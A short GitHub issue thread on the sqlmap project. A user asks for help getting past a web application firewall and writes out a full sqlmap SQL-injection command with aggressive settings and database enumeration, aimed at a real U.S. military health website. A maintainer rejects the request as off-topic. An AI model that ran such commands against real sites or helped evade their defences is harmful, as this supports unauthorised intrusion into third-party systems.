### ISSUE TITLE
SQLMap Unable To Bypass WAF With All Filters

### ISSUE THREAD

**Issue by VladmirPutin** [sqlmapproject/sqlmap#3364]
## SQLMap is unable to bypass WAF with all availbale filters tested

Tested Page: health.mil/reference-center?page=348/index.php

**Command Used:** sqlmap -u health.mil/reference-center?page=348/index.php?param_here --dbs --threads 5 --random-agent --time-sec 10 --technique=BEUS --risk=3 --level=5 -o

**SQLMap Response:** [WARNING] there is a possibility that the target (or WAF/IPS) is dropping 'suspicious' requests

Help get rid of this cyka

**Comment by stamparm** [comment]
Please, go to some forum (e.g. hackforums) and ask such question. This is a sqlmap Issue (e.g. bug) reporting panel.
